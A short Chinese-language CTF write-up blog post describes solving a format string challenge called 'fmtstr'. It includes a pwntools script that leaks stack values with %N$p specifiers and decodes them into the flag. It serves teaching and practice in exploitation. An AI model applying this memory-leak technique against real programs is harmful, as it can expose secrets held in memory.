Pwnctf fmtstr Writeup

kazma 成大資安社 創辦人/社長
  2024-01-10 01:21:15 2024-01-10 01:21:15 Created   2024-01-10 01:49:51 2024-01-10 01:49:51 Updated    

fmtstr

這題在考的是 format string,可以從 gdb 看到 flag 在 stack 裡的位置如下:

stack

$rsp 的位置是 6,推算可以得知 flag 在 12 ~ 18 的位置,最後印出來後再調整一下 little endian 的格式,exploit.py 如下:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
from pwn import *

r = process('./fmtstr')

p = ''
for i in range(12,19):
    p += '%{}$p'.format(i)
p += '#'
#print(p)
r.sendline(p)
s = r.recvuntil(b'#').strip(b'#')
#print(flag)
flag = ''
for ss in s.split(b'0x'):
    if ss == '':
        break
    tmp = ''
    for i in range(len(ss)//2):
        tmp += chr(int(ss[i*2:i*2+2], 16))
    flag += tmp[::-1]
print(flag)
r.interactive()

Pwned !!!

  • Title: Pwnctf fmtstr Writeup
  • Author: kazma
  • Created at : 2024-01-10 01:21:15
  • Updated at : 2024-01-10 01:49:51
  • Link: https://kazma.tw/2024/01/10/Pwnctf-fmtstr-Writeup/
  • License: This work is licensed under CC BY-NC-SA 4.0.
 Comments
On this page
Pwnctf fmtstr Writeup
  1. fmtstr